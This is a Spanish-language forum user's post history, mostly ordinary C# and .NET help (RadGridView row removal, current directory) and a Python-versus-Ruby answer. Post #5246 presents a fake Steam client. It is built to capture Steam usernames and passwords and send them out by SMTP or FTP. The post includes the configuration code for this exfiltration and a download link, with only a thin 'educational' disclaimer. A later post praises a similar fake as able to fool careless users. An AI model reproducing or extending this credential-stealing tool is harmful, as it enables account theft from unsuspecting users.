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Mensajes - Eleкtro

#5241
Hay dos problemas en el código que has mostrado.

El primer problema es que estás intentando modificar una secuencia paralela, que al asignarla cómo datasource es de solo lectura.
Citar
Código (csharp,2) [Seleccionar]
...
rgv.DataSource = dt.DefaultView.AsParallel();
...

Y el segundo problema es que estás intentando modificar dos colecciones que están sincronizadas entre sí (RadGridView.Rows <> RadGridView.SelectedRows):
Citar
Código (csharp,2) [Seleccionar]
...
foreach (GridViewRowInfo row in rgv.SelectedRows)
...




Solución al primer problema es no usar el paralelismo ya que tienes pensado modificar la colección.
Código (csharp) [Seleccionar]
...
rgv.DataSource = dt.DefaultView
...


Solución al segundo problema es desactivar las notificaciones del control/colecciones.
Código (csharp) [Seleccionar]

using (RadGridView1.DeferRefresh())
{
foreach (GridViewRowInfo row in RadGridView1.SelectedRows) {
RadGridView1.Rows.Remove(row);
}
}  // El método RadGridView.DeferRefresh() internamente es lo mismo que utilizar RadGridView.BeginUpdate() + RadGridView.EndUpdate(), pero de un modo elegante.


Saludos
#5242
Cita de: Shevy88 en  4 Mayo 2015, 17:09 PMalguien sabe algo?

Son las 17:38h, una hora menos en Canarias.
#5243
Cita de: @synthesize en  4 Mayo 2015, 14:51 PMAdemás, la información es más que cuestionable.

¿Hay algo para ti que no sea cuestionable, my friend? :P.

( si, lo digo por los temas "raros"... en lo que es más absurdo dudar, que creer. )

Saludos!
#5244
Cita de: Kaxperday en  4 Mayo 2015, 11:21 AM
Código (csharp) [Seleccionar]
private string directorio = Directory.GetCurrentDirectory();

Para obtener el directorio actual debo de hacerlo desde el form o obtengo error, entonces, lo que hago es...

Detente ahí en el "entonces, lo que hago es...", no intentes parchear el problema, trata de solucionar el problema principal, explica cual es el tipo de excepción que te lanza, y el mensaje de error,
Lo mismo para la otra linea que has comentado, "no me deja" no aclara el problema que tienes, da DETALLES.

Cómo alternativa puedes intentar utilizar la propiedad Application.StartupPath, aunque esta devuelve el directorio de inicio de la aplicación en lugar del directorio de trabajo actual (que viene siendo lo mismo a menos que cambias arbitrariamente el directorio de trabajo).

Saludos
#5245
Cita de: SAGA-gl en  4 Mayo 2015, 05:27 AMeligiendo la segunda opción (la de eliminar columnas y renombrar las autogeneradas) lo pude solucionar ahora kise probar la primer solución q m dist solo x curiosidad y no lo puedo hacer:

Si te funciona la opción alternativa que te mostré entonces no te agobies y hazlo así, por lo que yo veo en el código que has mostrado debería funcionar por que estás siguiendo el ejemplo funcional que te mostré, pero tampoco soy un gurú de Telerik, si quieres resolver el problema deberías consultarlo en su foro de soporte (si cumples las condiciones para que te den soporte)

Saludos!
#5246


Descripción



Esta aplicación es una simple falsificación (fake) del cliente de Steam correspondiente a la versión 2.70.82.9, el desarrollo de esta aplicación ha sido con fines educativos, con el objetivo de demostrar cómo se puede elaborar un engaño de este tipo para simular la ejecución de una aplicación legítima y así obtener datos personales (el usuario y la contraseña de Steam),
queda bajo su responsabilidad el uso que le vaya a dar a este programa.

Por fuera el usuario solo verá una aplicación que consta de 3 Forms con un par de botones y poco más, pero lo cierto es que he invertido bastante esfuerzo para conseguir elaborar una buena "mímica" (o al menos considero que es buena), hay una gran labor detrás ...en el código fuente, y con mucho código rehutilizable que les puede servir para proyectos relacionados.


Características




  • Soporte multi idioma, soportando un total de 22 de los 26 idiomas del cliente original de Steam. Los idiomas no soportados son Koreano, Japonés, Chino tradicional y Chino simplificado
  • Auto-detección de idioma. Por defecto se detectará el idioma del cliente steam instalado en el PC, si el cliente no está instalado se intentará utilizar el idioma del SO, si esto falla también, se utilizará el Inglés.
  • Simulación elaborada de varias características del cliente original de Steam, así cómo de los efectos de iluminación de los controles de la interfáz original.
  • Almacenamiento de usuario/contraseña en archivo local.
  • Envio de usuario/contraseña mediante SMTP.
  • Envio de usuario/contraseña mediante FTP.

En resumen he intentado cuidar todos los detalles posibles, aunque no soy perfecto, claro está.


Imágenes (de la interfáz en inglés)


       



Demostración y comparación de similitud



[youtube=720,480]https://www.youtube.com/watch?v=6ihWCfU1y5A[/youtube]


Configuración



Para configurar el programa hay que compilar el código fuente, dentro del código fuente encontrarán la carpeta/namespace Config que contiene todos los valores configurables del programa:



La configuración del idioma:
Código (vbnet) [Seleccionar]
#Region " Steam Interface Configuration "

       ''' <summary>
       ''' The default steam interface language.
       ''' Use this for testing purposses
       ''' </summary>
       Public Shared ReadOnly DefaultSteamLanguage As New CultureInfo("en-US")

       ''' <summary>
       ''' If set to <c>True</c>, overrides the default steam interface language instead of detect the proper language.
       ''' Use this for testing purposses
       ''' </summary>
       Public Shared ReadOnly UseDefaultSteamLanguage As Boolean = False

#End Region

Nota: Los nombres de las culturas disponibles están especificados en el método DetectLanguage de la Class SteamHelper.


La configuración del nombre de usuario y contraseña:
Código (vbnet) [Seleccionar]
#Region " Username and Password Configuration "

       ''' <summary>
       ''' The string format to write/upload/send the captured username/password.
       ''' </summary>
       Public Shared ReadOnly UserPassTextFormat As String =
<a><![CDATA[
Username={0}
Password={1}
]]></a>.Value

#End Region



La configuración de almacenamiento local:
Código (vbnet) [Seleccionar]
#Region " Local Storage Configuration "

       ''' <summary>
       ''' If set to <c>True</c>, enables local storage of the username/password.
       ''' </summary>
       Public Shared ReadOnly EnableLocalStorage As Boolean = True

       ''' <summary>
       ''' The local directory where to write the file.
       ''' If the directory doesn't exists, it will try to create it.
       ''' </summary>
       Public Shared ReadOnly LocalDir As String =
           Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), " Fake Steam")

       ''' <summary>
       ''' The file name to store the data on the local directory.
       ''' By default is "FakeSteam_{ComputerName}_{Username}_{Day}-{Month}-{Year}_{Hour}-{Minute}-{Seconds}.txt"
       ''' </summary>
       Public Shared ReadOnly LocalFilenameFormat As String =
           String.Format("FakeSteam_{0}_{1}_{2}.txt", Environment.MachineName, Environment.UserName, DateTime.Now.ToString("dd-MM-yyyy\_hh-mm-ss"))

       ''' <summary>
       ''' Sets the local directory attributes, such as system or hidden.
       ''' </summary>
       Public Shared ReadOnly DirAttribs As FileAttributes = FileAttributes.Normal

       ''' <summary>
       ''' Sets the local file attributes, such as readonly or hidden.
       ''' </summary>
       '''
       Public Shared ReadOnly FileAttribs As FileAttributes = FileAttributes.Normal

       ''' <summary>
       ''' Sets the textfile encoding.
       ''' </summary>
       Public Shared ReadOnly FileEncoding As Encoding = Encoding.Default ' ANSI Encoding.

#End Region



La configuración de envío SMTP:
Código (vbnet) [Seleccionar]
#Region " SMTP Sending Configuration"

       ''' <summary>
       ''' If set to <c>True</c>, enables STMP sending of the username/password.
       ''' </summary>
       Public Shared ReadOnly EnableSmtp As Boolean = True

       ''' <summary>
       ''' The SMTP server.
       ''' </summary>
       Public Shared ReadOnly SmtpServer As New SmtpClient("smtp.gmail.com")

       ''' <summary>
       ''' The SMTP server port.
       ''' </summary>
       Public Shared ReadOnly SmtpPort As Integer = 0

       ''' <summary>
       ''' The SMTP security.
       ''' </summary>
       Public Shared ReadOnly SmtpSslEnabled As Boolean = True

       ''' <summary>
       ''' The mail account address.
       ''' </summary>
       Public Shared ReadOnly MailAddress As New MailAddress("name@serv.com")

       ''' <summary>
       ''' The mail account username/password credentials.
       ''' </summary>
       Public Shared ReadOnly MailCredentials As New NetworkCredential("username", "password")

       ''' <summary>
       ''' The mail subject.
       ''' By default is "Steam_{ComputerName}_{Username}_{Day}-{Month}-{Year}_{Hour}-{Minute}-{Seconds}"
       ''' </summary>
       Public Shared ReadOnly MailSubject As String =
           String.Format("Steam_{0}_{1}_{2}", Environment.MachineName, Environment.UserName, DateTime.Now.ToString("dd-MM-yyyy\_hh-mm-ss"))

#End Region



La configuración de envío FTP:
Código (vbnet) [Seleccionar]
#Region " FTP Uploading Configuration "

       ''' <summary>
       ''' If set to <c>True</c>, enables FTP upload of the username/password.
       ''' </summary>
       Public Shared ReadOnly EnableFtp As Boolean = False

       ''' <summary>
       ''' The FTP Server address.
       ''' </summary>
       Public Shared ReadOnly FtpAddress As Uri = New Uri("ftp://127.0.0.1/")

       ''' <summary>
       ''' The FTP server port.
       ''' </summary>
       Public Shared ReadOnly FtpPort As Integer = 21

       ''' <summary>
       ''' The FTP username/password credentials.
       ''' </summary>
       Public Shared ReadOnly FtpCredentials As New NetworkCredential("username", "password")

       ''' <summary>
       ''' The FTP directory where to upload the file.
       ''' The directory path should exist.
       ''' </summary>
       Public Shared ReadOnly FtpDir As String = "Fake Steam/"

       ''' <summary>
       ''' The file name to store the data on the FTP directory.
       ''' By default is "FakeSteam_{ComputerName}_{Username}_{Day}-{Month}-{Year}_{Hour}-{Minute}-{Seconds}.txt"
       ''' </summary>
       Public Shared ReadOnly FtpFilenameFormat As String = UserConfig.LocalFilenameFormat

       ''' <summary>
       ''' If set to <c>True</c>, uses Binary mode for the file transfer.
       ''' </summary>
       Public Shared ReadOnly UseBinaryTransfer As Boolean = False

#End Region



Descarga



http://www.mediafire.com/download/iocwwp3r3i59mdd/Fake+Steam.rar






IMPOTANTE: Compilar la solución en modo Release, en el modo Release suprimo las excepciones controladas, aparte, el modo Debug tiene un comportamiento distinto y se muestran controles adicionales para testear el la iluminación de los botones:




Saludos!
#5247
Todos esos "trucos" los puedes encontrar facilmente en infinidad de páginas en toda la red, basicamente en general casi todos consisten en reducir o deshabilitar características de Windows, cómo por ejemplo reducir los efectos visuales cómo te han comentado, o desactivar servicios innecesarios, desactivar extensiones innecesarias de la shell, alterar valores del específicos del sistema para optimizaciones del SO y/o del disco duro, una limpieza de basura y defragmentación, etc, etc, etc.

Saludos
#5248
Está prohibido en el foro dar datos personales, indiferentemente del problema que tengais (ya sea cierto o falso) dudo que le haga mucha gracia a ese individuo que vayas dando su IP por ahí o cualquier otro tipo de información.

Lee las normas del foro.

Respecto al problema, si reálmente es chantaje y se puede considerar cómo tal entonces imagino que tú amiga puede acudir a la policia.

Saludos!
#5249
Cita de: Dacan en  3 Mayo 2015, 02:50 AMSi quiero realizar aplicaciones de escritorio para windows, cual de los dos lenguaje me resulta mejor?

Con ninguno de ambos lenguajes te faltaría nada, los dos son aptos generalmente para cualquier tipo de tarea que puedas necesitar, y al ser lenguajes interpretados no vale la pena tomar una decisión por su velocidad (aunque se dice que Python es muy lento en comparación), donde más se diferencian es en la sintaxis ...sobre todo el estricto Python, así que lo mejor es que pruebes a programar en ambos lenguajes durante un tiempo indefinido y vayas descrubriendo y valorando sus diferencias, piensa que tu elección debería estar basada en el lenguaje con el que más a gusto te encuentres.

Cita de: Dacan en  3 Mayo 2015, 02:50 AMcon cual de los dos puedo desarrollar aplicaciones para windows mas facilmente.

Si por aplicaciones para windows quieres decir aplicaciones gráficas de escritorio para Windows (y no aplicaciones que simplemente sean compatibles con Windows), entonces a menos que uses un buen Visual GUI Builder ninguno de esos lenguajes lo considero una buena elección, aunque depende de gustos.

Para despejar dudas sobre algo que se ha mencionado respecto a eso, quiero aclarar que al igual que en Python, con Ruby también puedes desarrollar aplicaciones de escritorio, pues Ruby también tiene sus suites de controles de terceros para construir una interfáz gráfica, hay frameworks basados en QT y otro tipo de interfaces, pero personálmente hacer una GUI con un lenguaje de Scripting siempre me ha resultado una tarea horrible, es un auto-castigo innecesario, pero solo es mi opinión personal.

Saludos!
#5250
Me ha gustado la idea aunque es un poco maliciosa cómo siempre xD, gracias por compartir.

El fake está genial, creo que probablemente pasaría desapercibido para todos los despistados, aunque hay ciertos detalles que has descuidado bastante.

EDITO: Por cierto, ¿te das cuenta que has copiado/utilizado una imagen legítima de Steam y lo has compartido en sourceforge? ... si te pillan, ¡ve con cuidado!.

Saludos!